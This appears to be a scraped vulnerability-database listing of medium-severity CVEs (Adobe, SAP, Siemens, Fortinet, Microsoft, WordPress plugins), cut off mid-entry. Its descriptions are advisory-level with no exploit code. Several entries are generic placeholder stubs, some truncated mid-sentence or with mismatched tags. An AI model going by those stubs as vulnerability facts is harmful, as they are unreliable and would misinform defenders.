Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46858
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46857
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
Adobe
XSS
Experience Manager
-
CVE-2025-46855
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46854
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46853
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46851
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46850
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46848
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46847
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46846
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46845
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46844
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46843
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46842
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46841
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46838
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-44043
MEDIUM
CVSS 5.4
Keyoti SearchUnit prior to 9.0.0 is vulnerable to Server-Side Request Forgery (SSRF) in /Keyoti_SearchEngine_Web_Common/SearchService.svc/GetResults and /Keyoti_SearchEngine_Web_Common/SearchService.svc/GetLocationAndContentCategories. An attacker can specify their own SMB server as the indexDirectory value when making POST requests to the affected components. In doing so, an attacker can get the SearchUnit server to read and write configuration and log files from/to the attacker's server.
SSRF
-
CVE-2025-43699
MEDIUM
CVSS 5.3
A remote code execution vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Java
Authentication Bypass
-
CVE-2025-43579
MEDIUM
CVSS 5.5
Acrobat Reader versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier are affected by an Information Exposure vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to gain unauthorized access to sensitive information. Exploitation of this issue does not require user interaction.
Adobe
Information Disclosure
Authentication Bypass
Acrobat
Acrobat Reader
-
CVE-2025-43578
MEDIUM
CVSS 5.5
Acrobat Reader versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Buffer Overflow
Adobe
Information Disclosure
Acrobat Reader
Acrobat Dc
-
CVE-2025-42998
MEDIUM
CVSS 5.3
CVE-2025-42998 is a security vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
-
CVE-2025-42996
MEDIUM
CVSS 5.6
SAP MDM Server allows an attacker to gain control of existing client sessions and execute certain functions without having to re-authenticate, giving the ability to access or modify non-sensitive information or consume sufficient resources to degrade the performance of the server, causing low impact on confidentiality, integrity and availability of the application.
Sap
Information Disclosure
-
CVE-2025-42993
MEDIUM
CVSS 6.7
A remote code execution vulnerability (CVSS 6.7) that allows the attacker. Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
RCE
-
CVE-2025-42991
MEDIUM
CVSS 4.3
CVE-2025-42991 is a security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
-
CVE-2025-42987
MEDIUM
CVSS 4.3
CVE-2025-42987 is a security vulnerability (CVSS 4.3) that allows an attacker with basic privileges. Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
-
CVE-2025-42984
MEDIUM
CVSS 5.4
CVE-2025-42984 is a security vulnerability (CVSS 5.4). Remediation should follow standard vulnerability management procedures.
Sap
Authentication Bypass
-
CVE-2025-41657
MEDIUM
CVSS 4.3
CVE-2025-41657 is a security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Information Disclosure
-
CVE-2025-40569
MEDIUM
CVSS 4.8
A vulnerability has been identified in RUGGEDCOM RST2428P (6GK6242-6PA00) (All versions < V3.2), SCALANCE XCH328 (6GK5328-4TS01-2EC2) (All versions < V3.2), SCALANCE XCM324 (6GK5324-8TS01-2AC2) (All versions < V3.2), SCALANCE XCM328 (6GK5328-4TS01-2AC2) (All versions < V3.2), SCALANCE XCM332 (6GK5332-0GA01-2AC2) (All versions < V3.2), SCALANCE XRH334 (24 V DC, 8xFO, CC) (6GK5334-2TS01-2ER3) (All versions < V3.2), SCALANCE XRM334 (230 V AC, 12xFO) (6GK5334-3TS01-3AR3) (All versions < V3.2), SCALANCE XRM334 (230 V AC, 8xFO) (6GK5334-2TS01-3AR3) (All versions < V3.2), SCALANCE XRM334 (230V AC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-3AR3) (All versions < V3.2), SCALANCE XRM334 (24 V DC, 12xFO) (6GK5334-3TS01-2AR3) (All versions < V3.2), SCALANCE XRM334 (24 V DC, 8xFO) (6GK5334-2TS01-2AR3) (All versions < V3.2), SCALANCE XRM334 (24V DC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-2AR3) (All versions < V3.2), SCALANCE XRM334 (2x230 V AC, 12xFO) (6GK5334-3TS01-4AR3) (All versions < V3.2), SCALANCE XRM334 (2x230 V AC, 8xFO) (6GK5334-2TS01-4AR3) (All versions < V3.2), SCALANCE XRM334 (2x230V AC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-4AR3) (All versions < V3.2). The "Load Configuration from Local PC" functionality in the web interface of affected products contains a race condition vulnerability. This could allow an authenticated remote attacker to make the affected product load an attacker controlled configuration instead of the legitimate one. Successful exploitation requires that a legitimate administrator invokes the functionality and the attacker wins the race condition.
Siemens
Race Condition
Information Disclosure
-
CVE-2025-40568
MEDIUM
CVSS 4.3
A security vulnerability (CVSS 4.3). Remediation should follow standard vulnerability management procedures.
Siemens
Authentication Bypass
-
CVE-2025-40567
MEDIUM
CVSS 6.5
A security vulnerability (CVSS 6.5). Remediation should follow standard vulnerability management procedures.
Siemens
Authentication Bypass
-
CVE-2025-36580
MEDIUM
CVSS 6.1
Dell Wyse Management Suite, versions prior to WMS 5.2, contain an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to script injection.
XSS
Dell
Wyse Management Suite
-
CVE-2025-36578
MEDIUM
CVSS 6.8
Dell Wyse Management Suite, versions prior to WMS 5.2, contain an Incorrect Authorization vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.
Authentication Bypass
Dell
Wyse Management Suite
-
CVE-2025-36577
MEDIUM
CVSS 6.1
Dell Wyse Management Suite, versions prior to WMS 5.2, contain an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to script injection.
XSS
Dell
Wyse Management Suite
-
CVE-2025-33069
MEDIUM
CVSS 5.1
Improper verification of cryptographic signature in App Control for Business (WDAC) allows an unauthorized attacker to bypass a security feature locally.
Authentication Bypass
Windows Server 2025
Windows 11 24h2
Microsoft
-
CVE-2025-33065
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 11 22h2
Windows Server 2025
-
CVE-2025-33063
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 22h2
Windows Server 2025
-
CVE-2025-33062
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 11 22h2
Windows 10 22h2
-
CVE-2025-33061
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows Server 2016
Windows Server 2025
-
CVE-2025-33060
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 21h2
Windows 10 22h2
-
CVE-2025-33059
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 1607
Windows 10 1507
-
CVE-2025-33058
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 21h2
Windows 11 24h2
-
CVE-2025-33057
MEDIUM
CVSS 6.5
Null pointer dereference in Windows Local Security Authority (LSA) allows an authorized attacker to deny service over a network.
Microsoft
Null Pointer Dereference
Denial Of Service
Windows 10 1809
Windows 11 24h2
-
CVE-2025-33055
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 11 22h2
Windows Server 2016
-
CVE-2025-33052
MEDIUM
CVSS 5.5
Use of uninitialized resource in Windows DWM Core Library allows an authorized attacker to disclose information locally.
Microsoft
Information Disclosure
Windows 10 22h2
Windows 11 23h2
Windows Server 2022
-
CVE-2025-32722
MEDIUM
CVSS 5.5
Improper access control in Windows Storage Port Driver allows an authorized attacker to disclose information locally.
Microsoft
Authentication Bypass
Windows 10 1507
Windows Server 2022
Windows 11 24h2
-
CVE-2025-32720
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 1607
Windows 10 1507
-
CVE-2025-32719
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows Server 2022 23h2
Windows 10 1607
-
CVE-2025-32715
MEDIUM
CVSS 6.5
Out-of-bounds read in Remote Desktop Client allows an unauthorized attacker to disclose information over a network.
Buffer Overflow
Information Disclosure
Windows 10 1809
Windows Server 2022 23h2
Windows Server 2019
-
CVE-2025-31325
MEDIUM
CVSS 5.8
Due to a Cross-Site Scripting vulnerability in SAP NetWeaver (ABAP Keyword Documentation), an unauthenticated attacker could inject malicious JavaScript into a web page through an unprotected parameter. When a victim accesses the affected page, the script executes in their browser, providing the attacker limited access to restricted information. The vulnerability does not affect data integrity or availability and operates entirely within the context of the client's browser.
Sap
XSS
-
CVE-2025-30321
MEDIUM
CVSS 5.5
InDesign Desktop versions ID20.2, ID19.5.3 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application, causing disruption in service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Null Pointer Dereference
Denial Of Service
Indesign
-
CVE-2025-27505
MEDIUM
CVSS 5.3
GeoServer is an open source server that allows users to share and edit geospatial data. It is possible to bypass the default REST API security and access the index page. The REST API security handles rest and its subpaths but not rest with an extension (e.g., rest.html). The REST API index can disclose whether certain extensions are installed. This vulnerability is fixed in 2.26.3 and 2.25.6. As a workaround, in ${GEOSERVER_DATA_DIR}/security/config.xml, change the paths for the rest filter to /rest.*,/rest/** and change the paths for the gwc filter to /gwc/rest.*,/gwc/rest/** and restart GeoServer.
Authentication Bypass
Geoserver
-
CVE-2025-27207
MEDIUM
CVSS 6.5
Adobe Commerce versions 2.4.8, 2.4.7-p5, 2.4.6-p10, 2.4.5-p12, 2.4.4-p13 and earlier are affected by an Improper Access Control vulnerability that could result in privilege escalation. A low privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized read access. Exploitation of this issue does not require user interaction.
Adobe
Privilege Escalation
Authentication Bypass
Commerce B2b
-
CVE-2025-27206
MEDIUM
CVSS 5.3
Adobe Commerce versions 2.4.8, 2.4.7-p5, 2.4.6-p10, 2.4.5-p12, 2.4.4-p13 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain limited write access. Exploitation of this issue does not require user interaction.
Adobe
Authentication Bypass
Commerce B2b
Commerce
Magento
-
CVE-2025-26394
MEDIUM
CVSS 4.8
SolarWinds Observability Self-Hosted is susceptible to an open redirection vulnerability. The URL is not properly sanitized, and an attacker could manipulate the string to redirect a user to a malicious site. The attack complexity is high, and authentication is required.
Open Redirect
Observability Self Hosted
-
CVE-2025-25250
MEDIUM
CVSS 4.3
An Exposure of Sensitive Information to an Unauthorized Actor vulnerability [CWE-200] in the SSL-VPN web-mode of FortiOS version 7.6.0, version 7.4.7 and below, 7.2 all versions, 7.0 all versions and 6.4 all versions may allow an authenticated user to access the full SSL-VPN settings via a crafted URL.
Information Disclosure
Fortinet
Fortisase
Fortios
-
CVE-2025-24471
MEDIUM
CVSS 6.5
An Improper Certificate Validation vulnerability [CWE-295] in FortiOS version 7.6.1 and below and version 7.4.7 and below may allow an EAP-verified remote user to connect from FortiClient via a revoked certificate.
Fortinet
Information Disclosure
Fortios
Fortisase
-
CVE-2025-24069
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows Server 2016
Windows 10 22h2
-
CVE-2025-24068
MEDIUM
CVSS 5.5
Buffer over-read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Windows Server 2016
Windows 11 22h2
Windows 10 22h2
-
CVE-2025-24065
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows Server 2022
Windows 11 24h2
-
CVE-2025-22829
MEDIUM
CVSS 4.3
The CloudStack Quota plugin has improper privilege management logic in version 4.20.0.0. Anyone with authenticated user-account access in a CloudStack 4.20.0.0 environment where this plugin is enabled, and who has access to specific APIs, can enable or disable reception of quota-related emails for any account in the environment and list their configurations.
Quota plugin users using CloudStack 4.20.0.0 are recommended to upgrade to CloudStack version 4.20.1.0, which fixes this issue.
Privilege Escalation
Cloudstack
-
CVE-2025-22256
MEDIUM
CVSS 6.3
A security vulnerability in Fortinet FortiPAM 1.4.0 (CVSS 6.3) that allows an attacker. Remediation should follow standard vulnerability management procedures.
Fortinet
Information Disclosure
Fortipam
Fortisra
-
CVE-2025-22254
MEDIUM
CVSS 6.6
An Improper Privilege Management vulnerability [CWE-269] in Fortinet FortiOS 7.6.0 through 7.6.1, FortiOS 7.4.0 through 7.4.6, FortiOS 7.2.0 through 7.2.10, FortiOS 7.0.0 through 7.0.16, FortiOS 6.4.0 through 6.4.15, FortiProxy 7.6.0 through 7.6.1, FortiProxy 7.4.0 through 7.4.7, FortiWeb 7.6.0 through 7.6.1, FortiWeb 7.4.0 through 7.4.6 allows an authenticated attacker with at least read-only admin permissions to gain super-admin privileges via crafted requests to the Node.js websocket module.
Node.js
Privilege Escalation
Fortinet
Fortiweb
Fortios
-
CVE-2025-5975
MEDIUM
CVSS 4.3
A vulnerability, which was classified as problematic, was found in PHPGurukul Rail Pass Management System 1.0. This affects an unknown part of the file /rpms/download-pass.php. The manipulation of the argument searchdata leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
Rail Pass Management System
-
CVE-2025-5971
MEDIUM
CVSS 6.3
A vulnerability was found in code-projects School Fees Payment System 1.0. It has been classified as critical. This affects an unknown part of the file /ajx.php. The manipulation of the argument name_startsWith leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
School Fees Payment System
-
CVE-2025-5935
MEDIUM
CVSS 5.3
A vulnerability was found in Open5GS up to 2.7.3. It has been declared as problematic. Affected by this vulnerability is the function common_register_state of the file src/mme/emm-sm.c of the component AMF/MME. The manipulation of the argument ran_ue_id leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 62cb99755243c9c38e4c060c5d8d0e158fe8cdd5. It is recommended to apply a patch to fix this issue.
Denial Of Service
Debian
Open5gs
-
CVE-2025-5925
MEDIUM
CVSS 4.3
The Bunny’s Print CSS plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.95. This is due to missing or incorrect nonce validation on the pcss_options_subpanel() function. This makes it possible for unauthenticated attackers to update settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
WordPress
CSRF
PHP
-
CVE-2025-5743
MEDIUM
CVSS 5.5
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote control over the charging station when an authenticated user modifies configuration parameters on the web server.
Command Injection
-
CVE-2025-5742
MEDIUM
CVSS 5.4
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists when an authenticated user modifies configuration parameters on the web server.
XSS
-
CVE-2025-5741
MEDIUM
CVSS 4.9
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that could cause arbitrary file reads from the charging station. The exploitation of this vulnerability does require an authenticated session of the web server.
Path Traversal
-
CVE-2025-4774
MEDIUM
CVSS 6.4
The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-countdown attribute of Countdown widget in all versions up to, and including, 4.11.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
Premium Addons For Elementor
PHP
-
CVE-2025-4577
MEDIUM
CVSS 6.4
The Smash Balloon Social Post Feed - Simple Social Feeds for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-color attribute in all versions up to, and including, 4.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
Smash Balloon Social Post Feed
PHP
-
CVE-2025-3905
MEDIUM
CVSS 5.4
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists impacting PLC system variables that could allow an authenticated malicious user to inject unvalidated data, leading to the modification or reading of data in a victim's browser.
XSS
-
CVE-2025-3899
MEDIUM
CVSS 5.4
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists in the Certificates page on the Webserver that could allow an authenticated malicious user to inject unvalidated data, leading to the modification or reading of data in a victim's browser.
XSS
-
CVE-2025-3898
MEDIUM
CVSS 6.5
CWE-20: Improper Input Validation vulnerability exists that could cause Denial of Service when an authenticated malicious user sends an HTTPS request containing an invalid data type to the webserver.
Denial Of Service
-
CVE-2025-3117
MEDIUM
CVSS 5.4
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists impacting configuration file paths that could allow an authenticated malicious user to inject unvalidated data, leading to the modification or reading of data in a victim's browser.
XSS
-
CVE-2025-3116
MEDIUM
CVSS 6.5
CWE-20: Improper Input Validation vulnerability exists that could cause Denial of Service when an authenticated malicious user sends a specially malformed HTTPS request containing improperly formatted body data to the controller.
Denial Of Service
-
CVE-2025-3112
MEDIUM
CVSS 6.5
CWE-400: Uncontrolled Resource Consumption vulnerability exists that could cause Denial of Service when an authenticated malicious user sends a manipulated HTTPS Content-Length header to the webserver.
Denial Of Service
-
CVE-2025-3076
MEDIUM
CVSS 6.4
The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘button_text’ parameter in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
Elementor Page Builder
PHP
-
CVE-2025-2918
MEDIUM
CVSS 6.4
The Ultimate Blocks - WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
Ultimate Blocks
PHP
-
CVE-2025-2884
MEDIUM
CVSS 6.6
The TCG TPM2.0 Reference Implementation's CryptHmacSign helper function is vulnerable to an out-of-bounds read due to a lack of validation of the signature scheme against the signature key's algorithm. See Errata Revision 1.83 and advisory TCGVRT0009 for the TCG standard TPM2.0.
Buffer Overflow
Information Disclosure
-
CVE-2025-0037
MEDIUM
CVSS 6.6
CVE-2025-0037 is a security vulnerability (CVSS 6.6) that allows access. Remediation should follow standard vulnerability management procedures.
Information Disclosure
-
CVE-2024-57189
MEDIUM
CVSS 5.4
In Erxes <1.6.2, an authenticated attacker can write to arbitrary files on the system using a Path Traversal vulnerability in the importHistoriesCreate GraphQL mutation handler.
Path Traversal
Erxes
-
CVE-2024-57186
MEDIUM
CVSS 5.4
In Erxes <1.6.2, an unauthenticated attacker can read arbitrary files from the system using a Path Traversal vulnerability in the /read-file endpoint handler.
Path Traversal
Erxes
-
CVE-2024-54019
MEDIUM
CVSS 4.8
A security vulnerability in Fortinet FortiClientWindows (CVSS 4.8) that allows an unauthorized attacker. Remediation should follow standard vulnerability management procedures.
Fortinet
Authentication Bypass
Forticlient
Windows
-
CVE-2024-50568
MEDIUM
CVSS 5.9
A security vulnerability in Fortinet FortiOS (CVSS 5.9) that allows an unauthenticated attacker with the knowledge of device specific data. Remediation should follow standard vulnerability management procedures.
Fortinet
Information Disclosure
Fortiproxy
Fortios
-
CVE-2024-50562
MEDIUM
CVSS 4.8
An Insufficient Session Expiration vulnerability [CWE-613] in FortiOS SSL-VPN version 7.6.0, version 7.4.6 and below, version 7.2.10 and below, 7.0 all versions, 6.4 all versions may allow an attacker in possession of a cookie used to log in the SSL-VPN portal to log in again, although the session has expired or was logged out.
Fortinet
Information Disclosure
Fortios
Fortisase
-
CVE-2024-45329
MEDIUM
CVSS 4.3
An authorization bypass through user-controlled key in Fortinet FortiPortal versions 7.4.0, versions 7.2.0 through 7.2.5, and versions 7.0.0 through 7.0.8 may allow an authenticated attacker to view unauthorized device information via key modification in API requests.
Fortinet
Authentication Bypass
Fortiportal
-
CVE-2024-41797
MEDIUM
CVSS 4.3
A vulnerability has been identified in RUGGEDCOM RST2428P (6GK6242-6PA00) (All versions < V3.1), SCALANCE XC316-8 (6GK5324-8TS00-2AC2) (All versions < V3.1), SCALANCE XC324-4 (6GK5328-4TS00-2AC2) (All versions < V3.1), SCALANCE XC324-4 EEC (6GK5328-4TS00-2EC2) (All versions < V3.1), SCALANCE XC332 (6GK5332-0GA00-2AC2) (All versions < V3.1), SCALANCE XC416-8 (6GK5424-8TR00-2AC2) (All versions < V3.1), SCALANCE XC424-4 (6GK5428-4TR00-2AC2) (All versions < V3.1), SCALANCE XC432 (6GK5432-0GR00-2AC2) (All versions < V3.1), SCALANCE XCH328 (6GK5328-4TS01-2EC2) (All versions < V3.1), SCALANCE XCM324 (6GK5324-8TS01-2AC2) (All versions < V3.1), SCALANCE XCM328 (6GK5328-4TS01-2AC2) (All versions < V3.1), SCALANCE XCM332 (6GK5332-0GA01-2AC2) (All versions < V3.1), SCALANCE XR302-32 (6GK5334-5TS00-2AR3) (All versions < V3.1), SCALANCE XR302-32 (6GK5334-5TS00-3AR3) (All versions < V3.1), SCALANCE XR302-32 (6GK5334-5TS00-4AR3) (All versions < V3.1), SCALANCE XR322-12 (6GK5334-3TS00-2AR3) (All versions < V3.1), SCALANCE XR322-12 (6GK5334-3TS00-3AR3) (All versions < V3.1), SCALANCE XR322-12 (6GK5334-3TS00-4AR3) (All versions < V3.1), SCALANCE XR326-8 (6GK5334-2TS00-2AR3) (All versions < V3.1), SCALANCE XR326-8 (6GK5334-2TS00-3AR3) (All versions < V3.1), SCALANCE XR326-8 (6GK5334-2TS00-4AR3) (All versions < V3.1), SCALANCE XR326-8 EEC (6GK5334-2TS00-2ER3) (All versions < V3.1), SCALANCE XR502-32 (6GK5534-5TR00-2AR3) (All versions < V3.1), SCALANCE XR502-32 (6GK5534-5TR00-3AR3) (All versions < V3.1), SCALANCE XR502-32 (6GK5534-5TR00-4AR3) (All versions < V3.1), SCALANCE XR522-12 (6GK5534-3TR00-2AR3) (All versions < V3.1), SCALANCE XR522-12 (6GK5534-3TR00-3AR3) (All versions < V3.1), SCALANCE XR522-12 (6GK5534-3TR00-4AR3) (All versions < V3.1), SCALANCE XR526-8 (6GK5534-2TR00-2AR3) (All versions < V3.1), SCALANCE XR526-8 (6GK5534-2TR00-3AR3) (All versions < V3.1), SCALANCE XR526-8 (6GK5534-2TR00-4AR3) (All versions < V3.1), SCALANCE XRH334 (24 V DC, 8xFO, CC) (6GK5334-2TS01-2ER3) (All versions < V3.1), SCALANCE XRM334 (230 V AC, 12xFO) (6GK5334-3TS01-3AR3) (All versions < V3.1), SCALANCE XRM334 (230 V AC, 8xFO) (6GK5334-2TS01-3AR3) (All versions < V3.1), SCALANCE XRM334 (230V AC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-3AR3) (All versions < V3.1), SCALANCE XRM334 (24 V DC, 12xFO) (6GK5334-3TS01-2AR3) (All versions < V3.1), SCALANCE XRM334 (24 V DC, 8xFO) (6GK5334-2TS01-2AR3) (All versions < V3.1), SCALANCE XRM334 (24V DC, 2x10G, 24xSFP, 8xSFP+) 